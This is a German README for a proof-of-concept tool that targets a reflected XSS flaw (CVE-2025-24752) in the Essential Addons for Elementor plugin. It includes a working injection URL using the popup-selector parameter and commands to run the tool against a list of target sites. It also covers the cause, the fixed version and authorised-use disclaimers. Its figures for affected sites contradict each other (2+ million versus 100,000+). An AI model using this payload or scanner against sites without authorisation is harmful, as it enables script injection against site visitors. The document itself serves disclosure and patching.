
Hallo, ich bin Chirag Artani. Dies ist der POC der Reflected XSS in Essential Addons for Elementor, die 2+ Millionen Seiten betrifft - CVE-2025-24752
Dieses Tool dient ausschließlich der Sicherheitsforschung und Patchzwecken. Verwenden Sie es nicht, um Websites zu schädigen. Wenn Sie gefährdete Websites finden, melden Sie sie verantwortungsbewusst den Betreibern, damit diese sie umgehend aktualisieren können.
Eine reflektierte XSS-Schwachstelle in Essential Addons für Elementor betrifft über 100.000+ Websites, die Versionen unter 6.0.15 verwenden. Dieser Schwachstelle wurde CVE-2025-24752 zugewiesen.
https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1

pip install selenium webdriver-manager
python poc.py targets.txt
Ein perfektes Erkennungstemplate für das Plugin ist in den Assets enthalten: detect-elementor-for-xss.yaml
Die Schwachstelle tritt aufgrund unzureichender Validierung und Bereinigung des popup-selector-Abfragearguments auf, sodass ein bösartiger Wert an den Benutzer zurückgespiegelt werden kann. Behoben in Version 6.0.15.
Weitere Details: Patchstack-Artikel
Dieses Tool wird ausschließlich zu Bildungs- und Schutzzwecken bereitgestellt. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie eine Website auf Schwachstellen testen. Der Autor übernimmt keine Verantwortung für Missbrauch dieses Tools.
Dank an die verantwortungsbewussten Sicherheitsforscher, die diese Schwachstelle identifiziert und gemeldet haben.